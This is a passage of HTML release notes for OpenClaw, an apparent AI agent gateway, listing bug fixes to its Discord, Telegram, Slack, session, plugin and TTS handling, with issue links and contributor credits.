<p>Replies/typing: keep typing alive for queued follow-up messages that are genuinely waiting behind an active run, instead of making chat surfaces look idle while work is queued. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251046189" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65685" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65685/hovercard" href="https://github.com/openclaw/openclaw/issues/65685">#65685</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/papag00se/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/papag00se">@papag00se</a>.</p>
</li>
<li>
<p>ACP/Discord: suppress completion announce delivery for inline thread-bound ACP session runs, so Discord thread-bound ACP replies are not delivered twice. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204352483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60780" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60780/hovercard" href="https://github.com/openclaw/openclaw/issues/60780">#60780</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solavrc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solavrc">@solavrc</a>.</p>
</li>
<li>
<p>Discord/threads: ignore webhook-authored copies in already-bound Discord session threads even when the webhook id differs, preventing PluralKit proxy copies from creating duplicate turn pressure. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114424047" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52005" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52005/hovercard" href="https://github.com/openclaw/openclaw/issues/52005">#52005</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>.</p>
</li>
<li>
<p>Discord/threads: return the created thread as partial success when the follow-up initial message fails, so agents do not retry thread creation and create empty duplicate threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084295408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48450" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48450/hovercard" href="https://github.com/openclaw/openclaw/issues/48450">#48450</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dahifi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dahifi">@dahifi</a>.</p>
</li>
<li>
<p>Discord/components: consume every button or select in a non-reusable component message after the first authorized click, so single-use panels cannot fire sibling callbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132338088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54227" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54227/hovercard" href="https://github.com/openclaw/openclaw/issues/54227">#54227</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fujiwarakasei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fujiwarakasei">@fujiwarakasei</a>.</p>
</li>
<li>
<p>macOS/config: preserve existing <code>gateway.auth</code> and unrelated config keys during app fallback writes, so dashboard or Talk settings changes cannot strand Control UI clients by dropping persisted auth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364348126" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75631" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75631/hovercard" href="https://github.com/openclaw/openclaw/issues/75631">#75631</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fuma2013/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fuma2013">@Fuma2013</a>.</p>
</li>
<li>
<p>Control UI/TUI: keep reconnecting chat sends bound to the same backing session id and let TUI relaunches resume the last selected session, avoiding silent fresh sessions after refresh, reconnect, or terminal restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225359321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63195" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63195/hovercard" href="https://github.com/openclaw/openclaw/issues/63195">#63195</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283461066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68162" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68162/hovercard" href="https://github.com/openclaw/openclaw/issues/68162">#68162</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342917722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73546" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73546/hovercard" href="https://github.com/openclaw/openclaw/issues/73546">#73546</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bond260312-cmyk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bond260312-cmyk">@bond260312-cmyk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhong18804784882/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhong18804784882">@zhong18804784882</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mtuwei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mtuwei">@mtuwei</a>.</p>
</li>
<li>
<p>Plugins/tools: let plugin manifests declare static tool availability so reply startup skips unavailable plugin tool runtimes instead of importing factories that only return <code>null</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Discord/reactions: skip reaction listener registration when DMs and group DMs are disabled and every configured guild has <code>reactionNotifications: "off"</code>, avoiding needless reaction-event queue work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078796783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47516" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47516/hovercard" href="https://github.com/openclaw/openclaw/issues/47516">#47516</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/x4v13r1120/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/x4v13r1120">@x4v13r1120</a>.</p>
</li>
<li>
<p>CLI sessions: preserve explicit manual-attach reuse bindings so trusted CLI sessions are not invalidated on the first turn when auth, prompt, or MCP fingerprints drift. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072718" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75849/hovercard" href="https://github.com/openclaw/openclaw/issues/75849">#75849</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Telegram/streaming: keep partial preview streaming enabled for plain reply-to replies, disabling drafts only for real native quote excerpts that require Telegram quote parameters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577179" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73505" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73505/hovercard" href="https://github.com/openclaw/openclaw/issues/73505">#73505</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/choury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/choury">@choury</a>.</p>
</li>
<li>
<p>Config: log the "newer OpenClaw" version warning once per process instead of once per config snapshot read. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367749952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75927" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75927/hovercard" href="https://github.com/openclaw/openclaw/pull/75927">#75927</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</p>
</li>
<li>
<p>Telegram/message actions: treat benign delete-message 400s as no-op warnings instead of runtime errors, so stale or already-removed messages do not create noisy delete failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345339727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73726" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73726/hovercard" href="https://github.com/openclaw/openclaw/issues/73726">#73726</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Avicennasis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Avicennasis">@Avicennasis</a>.</p>
</li>
<li>
<p>Telegram: split long default markdown sends and media follow-up text into safe HTML chunks, so outbound messages over Telegram's limit no longer fail as one oversized Bot API request. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367257816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75868/hovercard" href="https://github.com/openclaw/openclaw/issues/75868">#75868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhengsx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhengsx">@zhengsx</a>.</p>
</li>
<li>
<p>Gateway/chat history: merge Claude CLI transcript imports for Anthropic-routed sessions that still have a Claude CLI binding, so local chat history does not hide CLI JSONL turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367073060" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75850/hovercard" href="https://github.com/openclaw/openclaw/issues/75850">#75850</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Media: trim serialized JSON suffixes after local <code>MEDIA:</code> directive file extensions, so generated-image metadata cannot pollute the parsed media path and cause false <code>ENOENT</code> delivery failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360047482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75182/hovercard" href="https://github.com/openclaw/openclaw/issues/75182">#75182</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TnzGit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TnzGit">@TnzGit</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Plugins/runtime: hot-reload Gateway plugin runtime surfaces after plugin enable/disable changes while keeping source-changing plugin install, update, and uninstall operations restart-backed so loaded module code is not reused. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330564867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72097" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72097/hovercard" href="https://github.com/openclaw/openclaw/issues/72097">#72097</a>.</p>
</li>
<li>
<p>Cron: make scheduler reload schedule comparison tolerate malformed persisted jobs, so one bad cron entry no longer aborts the whole tick. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367497925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75886" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75886/hovercard" href="https://github.com/openclaw/openclaw/issues/75886">#75886</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samfox-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samfox-ai">@samfox-ai</a>.</p>
</li>
<li>
<p>Doctor/channels: warn after migrations when default Telegram or Discord accounts have no configured token and their env fallback (<code>TELEGRAM_BOT_TOKEN</code> or <code>DISCORD_BOT_TOKEN</code>) is unavailable, with secret-safe migration docs for checking state-dir <code>.env</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74298/hovercard" href="https://github.com/openclaw/openclaw/issues/74298">#74298</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: keep idle liveness samples in telemetry instead of visible warning logs unless diagnostic work is active, waiting, or queued. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Channels/cron: reject provider-prefixed targets for the wrong channel and let prefixed announce targets such as <code>telegram:123</code> select their channel when delivery falls back to <code>last</code>, so Telegram IDs cannot be coerced into WhatsApp phone numbers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162988650" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56839/hovercard" href="https://github.com/openclaw/openclaw/issues/56839">#56839</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bencoremans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bencoremans">@bencoremans</a>.</p>
</li>
<li>
<p>Control UI/chat: keep live replies visible when a raw session alias such as <code>main</code> sends the chat turn but Gateway emits events under the canonical session key for the same run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345216396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73716" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73716/hovercard" href="https://github.com/openclaw/openclaw/issues/73716">#73716</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teebes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teebes">@teebes</a>.</p>
</li>
<li>
<p>CLI/models: reject <code>--agent</code> on <code>openclaw models set</code> and <code>set-image</code> instead of silently writing agent-scoped requests to global model defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286636018" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68391/hovercard" href="https://github.com/openclaw/openclaw/issues/68391">#68391</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/derrickabellard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/derrickabellard">@derrickabellard</a>.</p>
</li>
<li>
<p>CLI: stop treating the legacy singular <code>openclaw tool ...</code> token as a plugin id under restrictive <code>plugins.allow</code>, so it falls through as a normal unknown/reserved command instead of suggesting a stale allowlist entry. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243981916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64732/hovercard" href="https://github.com/openclaw/openclaw/issues/64732">#64732</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SweetSophia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SweetSophia">@SweetSophia</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hashtag1974/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hashtag1974">@hashtag1974</a>.</p>
</li>
<li>
<p>Media: write inbound media buffers through same-directory temp files before rename, so failed disk writes do not leave zero-byte artifacts for later voice transcription. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4154946745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55966" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55966/hovercard" href="https://github.com/openclaw/openclaw/issues/55966">#55966</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</p>
</li>
<li>
<p>TTS/Telegram: keep trusted local audio generated by the TTS tool queued for voice-note delivery even when the run-level built-in tool list omits the raw <code>tts</code> name. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354905008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74752/hovercard" href="https://github.com/openclaw/openclaw/issues/74752">#74752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loveworld3033/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loveworld3033">@Loveworld3033</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyliu">@andyliu</a>.</p>
</li>
<li>
<p>TTS: require explicit user or config audio intent for the agent speech tool so dashboard chats stay text unless audio is requested. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303803702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69777/hovercard" href="https://github.com/openclaw/openclaw/issues/69777">#69777</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>.</p>
</li>
<li>
<p>Plugins/config: keep bundled source-checkout plugins from being runtime-gated by install-only <code>minHostVersion</code> metadata, accept prerelease host floors, trim plugin-service startup failures to one log line, and avoid broad channel-runtime loading during base config parsing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Heartbeat: strip legacy <code>[TOOL_CALL]...[/TOOL_CALL]</code> and <code>[TOOL_RESULT]...[/TOOL_RESULT]</code> pseudo-call blocks from heartbeat replies before channel delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131762668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54138/hovercard" href="https://github.com/openclaw/openclaw/issues/54138">#54138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deniable9570/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deniable9570">@Deniable9570</a>.</p>
</li>
<li>
<p>macOS/Voice Wake: send wake-word and Push-to-Talk transcripts through the selected macOS session target instead of always falling back to main WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107671050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51040/hovercard" href="https://github.com/openclaw/openclaw/issues/51040">#51040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carl-jeffrolc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carl-jeffrolc">@carl-jeffrolc</a>.</p>
</li>
<li>
<p>Providers/xAI: give Grok <code>web_search</code> a 60s default timeout, harden malformed xAI Responses parsing, and return structured timeout errors instead of aborting the tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175237199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58063" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58063/hovercard" href="https://github.com/openclaw/openclaw/issues/58063">#58063</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183930735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58733/hovercard" href="https://github.com/openclaw/openclaw/issues/58733">#58733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dnishimura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dnishimura">@dnishimura</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvcasasola-svg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvcasasola-svg">@marvcasasola-svg</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</p>
</li>
<li>
<p>Providers/configure: preserve the existing default model when adding or reauthing a provider whose plugin returns a default-model config patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4099627324" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50268" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50268/hovercard" href="https://github.com/openclaw/openclaw/issues/50268">#50268</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rixcorp-oc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rixcorp-oc">@rixcorp-oc</a>.</p>
</li>
<li>
<p>Slack/message actions: send media before the follow-up Block Kit message when Slack <code>send</code> includes a file plus presentation or interactive controls, so file attachments are no longer rejected. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111591995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51458/hovercard" href="https://github.com/openclaw/openclaw/issues/51458">#51458</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HirokiKobayashi-R/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HirokiKobayashi-R">@HirokiKobayashi-R</a>.</p>
</li>
<li>
<p>Slack/DMs: honor <code>dmHistoryLimit</code> for fresh 1:1 Slack DM sessions by backfilling recent conversation history before the current reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240708914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64427/hovercard" href="https://github.com/openclaw/openclaw/issues/64427">#64427</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brantley-creator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brantley-creator">@brantley-creator</a>.</p>
</li>
<li>
<p>Slack/DMs: keep top-level direct messages on the stable DM session even when <code>replyToMode</code> targets Slack thread replies, preserving context across DM turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4184870759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58832" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58832/hovercard" href="https://github.com/openclaw/openclaw/issues/58832">#58832</a>. Thanks @daye-jjeong.</p>
</li>
<li>
<p>Slack/delivery: preserve Slack Web API missing-scope details in outbound delivery errors, so queued retry state identifies the OAuth scope to add. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216375787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62391/hovercard" href="https://github.com/openclaw/openclaw/issues/62391">#62391</a>. Thanks @alexey-pelykh.</p>
</li>
<li>
<p>Slack/capabilities: read granted scopes from <code>auth.test</code> response metadata before trying legacy scope APIs, so modern bot tokens no longer report <code>unknown_method</code> for channel capabilities. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068646797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44625/hovercard" href="https://github.com/openclaw/openclaw/issues/44625">#44625</a>. Thanks @Qquanwei and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>Slack/DMs: send text/block-only proactive DMs directly with <code>chat.postMessage(channel=&lt;user id&gt;)</code> while keeping conversation resolution for uploads and threaded sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213098355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62042" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62042/hovercard" href="https://github.com/openclaw/openclaw/issues/62042">#62042</a>. Thanks @MarkMolina.</p>
</li>
<li>
<p>Slack/routing: match route bindings written with Slack target syntax such as <code>channel:C...</code>, <code>user:U...</code>, or <code>&lt;@U...&gt;</code>, so bound Slack peers route to the configured agent instead of <code>main</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048907648" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41608" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41608/hovercard" href="https://github.com/openclaw/openclaw/issues/41608">#41608</a>. Thanks @Winnsolutionsadmin.</p>
</li>
<li>
<p>Slack/routing: match public-channel allowlist entries written as <code>channel:C...</code> against bare Slack runtime channel IDs, so allowed channel mentions do not fail as <code>channel-not-allowed</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046643845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41264" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41264/hovercard" href="https://github.com/openclaw/openclaw/issues/41264">#41264</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160915756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56530" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56530/hovercard" href="https://github.com/openclaw/openclaw/pull/56530">#56530</a>. Thanks @babutree and @Realworld404.</p>
</li>
<li>
<p>Slack/message actions: prefer the account bound to the outbound target peer before falling back to the agent's first channel account, so multi-workspace sends use the intended Slack account. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264751663" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66807" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66807/hovercard" href="https://github.com/openclaw/openclaw/pull/66807">#66807</a>. Thanks @rijhsinghani.</p>
</li>
<li>
<p>Slack/delivery: retry Slack Web API writes only when the SDK wraps a DNS request failure such as <code>EAI_AGAIN</code>, so transient resolver hiccups can recover without retrying platform errors that may duplicate messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289779783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68789" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68789/hovercard" href="https://github.com/openclaw/openclaw/issues/68789">#68789</a>. Thanks @sonnyb9.</p>
</li>
<li>
<p>Slack/message actions: forward agent-scoped media roots through the bundled upload-file action path, so workspace files can be attached without failing the local-media guard. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242973170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64625/hovercard" href="https://github.com/openclaw/openclaw/issues/64625">#64625</a>. Thanks @benpchandler.</p>
</li>
<li>
